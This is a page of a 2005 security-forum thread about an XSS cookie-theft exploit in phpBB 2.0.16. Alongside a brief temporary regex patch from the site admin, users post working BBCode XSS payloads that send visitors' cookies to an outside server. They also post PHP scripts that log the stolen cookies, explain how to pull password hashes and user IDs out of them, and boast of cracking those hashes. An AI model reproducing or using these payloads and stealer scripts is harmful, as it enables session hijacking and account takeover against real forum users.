Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 19, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 421
Members: 0
Total: 421
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Sun Jul 10, 2005 5:57 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




WaterBird wrote:
Btw any idea how to fix this hole ? Phpbb don't know about it yet ?


Ok, look at "includes/bbcode.php", function "bbencode_second_pass()":

Code:

   // matches a [url]xxxx://www.phpbb.com[/url] code..
   $patterns[] = "#\[url\]([\w]+?://[^ \"\n\r\t<]*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url1'];

   // [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
   $patterns[] = "#\[url\]((www|ftp)\.[^ \"\n\r\t<]*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url2'];

   // [url=xxxx://www.phpbb.com]phpBB[/url] code..
   $patterns[] = "#\[url=([\w]+?://[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url3'];

   // [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
   $patterns[] = "#\[url=((www|ftp)\.[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
   $replacements[] = $bbcode_tpl['url4'];



Now, you must improve those regexes, like:

Code:

[^ \"\n\r\t<]


Add there some more "dangerous" chars, like :

Code:

[^ \"\n\r\t\'\`\[\]<]


This is primitive and temporal patch, but it seems to work righ now.
When phpBB developers will release their own patch, i suggest to use that one Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jul 10, 2005 6:19 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




Thank You :}
View user's profile Send private message
cookie to pass
PostPosted: Sun Jul 10, 2005 8:22 pm Reply with quote
mimdrj
Beginner
Beginner
 
Joined: Jul 10, 2005
Posts: 1




i got cookies but i reallydon't know hoe to get pass from cookies please help it is too important for me thnks
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 8:52 pm Reply with quote
diaga
Regular user
Regular user
 
Joined: Jun 27, 2005
Posts: 22




works fine for me =]

By using a short domain (I'm using 3 char), you could even fit it into a signature =]
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 10:12 pm Reply with quote
g30rg3_x
Active user
Active user
 
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




Shocked

just a few hours and post get 33 post Laughing

yeah, i have to re read all the post, and i answer some questions that i see and this has not been correctly answered...

another bbcode flaw combination with Social engineering ,I think *_^

yeah it requires a social engineering, for grabing the most value cookie
who is the admin cookie Wink

sorry but i dont understand what do you mean only work on IE

yeah i know its too late, but this poc just execute on IE,
and excellent short video... Wink

by the way, g30rg3_x, did you manage to use this exploit ?

nop, i just remenber all you guys that this exploit its not officially patched, but our webmaster have been launch a unofficial but working patch Wink

Cookie Stealer Code...
mmm, i use this:
Code:

<?php
$cookie = $_GET['cookie'];
$fff = fopen("cookie.txt","a+");
fwrite($fff, "$cookie \n");
fclose($fff);
?>


jpg/txt/gif cookie stealer...

this doesnt exist they use a .txt or .jpg or .bmp or whatever, why???
this is simply if you put php this will execute in your server side, so if you put in .txt or whatever this "bad cookie stealer code" would be injected in the website and not include thats the real thing, thats happens and because are use .xxx extensions

i got cookies but i reallydon't know hoe to get pass from cookies please help it is too important for me thnks

as you see, you would get something like:
Code:

phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;};
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";i:666;}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998


the part you need its:
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";i:666;};

every information has a work, like the
c2150783216c11afea291d179e7b1902
its the hash of thepassword of the user that you steal his cookie...

"userid";i:666;
you can view this as:
userid: 666

so, now you sure ask, and what user its this, simply see his profile
http://www.theexploitedsite.com/forum/profile.php?mode=viewprofile&u=x

where the value x on u its the userid so in this case:
http://www.theexploitedsite.com/forum/profile.php?mode=viewprofile&u=666
and now you will see what user is Wink

sorry for the too late answers, but this topic moves so fast Razz
Laughing

regards


Last edited by g30rg3_x on Mon Jul 11, 2005 7:03 pm; edited 2 times in total
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Jul 11, 2005 6:27 pm Reply with quote
KingOfSka
Advanced user
Advanced user
 
Joined: Mar 13, 2005
Posts: 61




i tested locally and in some test forum, the exploit is working (i used a mine cookie stealer file) but i used mod rewrite to have a .png file to be processed as php, but the only problem is that it seems to work only in the body part of a post, and not in pm...
View user's profile Send private message Visit poster's website
PostPosted: Mon Jul 11, 2005 7:56 pm Reply with quote
700G
Active user
Active user
 
Joined: Mar 25, 2005
Posts: 33




I havent tired it in a PM yet, but it definitely works as a signature too Very Happy
View user's profile Send private message
PostPosted: Tue Jul 12, 2005 9:44 am Reply with quote
KingOfSka
Advanced user
Advanced user
 
Joined: Mar 13, 2005
Posts: 61




verbatim wrote:

any ideas ?is there a mistake here :
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

finally, did you manage to use this exploit with a personnal stealer script ?

(i know, a lot of question, but i guess it may help other readers Wink)

yes there's an error Very Happy it should be /cookie.php?var='+document.cookie , where var is the name of the variable that should store the cookie
View user's profile Send private message Visit poster's website
PostPosted: Wed Jul 13, 2005 3:11 am Reply with quote
theOne
Regular user
Regular user
 
Joined: May 31, 2005
Posts: 8




How would you go abouts doing it like they'r edoing at anticaht? using jpg and still getting info?
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 5:55 am Reply with quote
700G
Active user
Active user
 
Joined: Mar 25, 2005
Posts: 33




Herer is what exactly is working for me:



Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


and i am using this script:

Code:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


working very well. I have a long list of cracked MD5's using Cain and rainbow tables Very Happy
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 11:54 am Reply with quote
_daemon_
Beginner
Beginner
 
Joined: Jul 13, 2005
Posts: 4
Location: Greece




Hey there, thats great info! Congrats. I'd like to ask a question: Why cant this work on firefox? Its ok with IE but many people use ff, opera, etc. nowdays. Thanks a bunch
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Wed Jul 13, 2005 12:42 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




_daemon_ wrote:
Hey there, thats great info! Congrats. I'd like to ask a question: Why cant this work on firefox? Its ok with IE but many people use ff, opera, etc. nowdays. Thanks a bunch


Maybe because IE is less restrictive on some rules, like using of the various quotes. I mean, firefox will not accept " ` " character as substitute of the single or double quote.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 13, 2005 9:35 pm Reply with quote
g30rg3_x
Active user
Active user
 
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




in the original advisory in russian
( http://antichat.ru/txt/phpbb/ )

says that this exploits works because, IE takes ` at his equivalent " so thats for only execute in IE and not with others engines..
Quote:

....
Pay attention to a symbol `. It not ', but in this case is perceived Internet Explorer'ii as its equivalent. Here result:



regards
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Jul 14, 2005 12:09 am Reply with quote
Slobo
Beginner
Beginner
 
Joined: Jul 14, 2005
Posts: 2




What if the admin control panel is password protected, how should the cookie be edited to login automatically in the admin area?
View user's profile Send private message
PostPosted: Thu Jul 14, 2005 8:06 am Reply with quote
KingOfSka
Advanced user
Advanced user
 
Joined: Mar 13, 2005
Posts: 61




sometimes you simply can't, there are some mod that require the admin to inserti his password to log in the admin panel, regardless cookies, so you have to crack it
View user's profile Send private message Visit poster's website
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 3 of 8  
Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.180 Seconds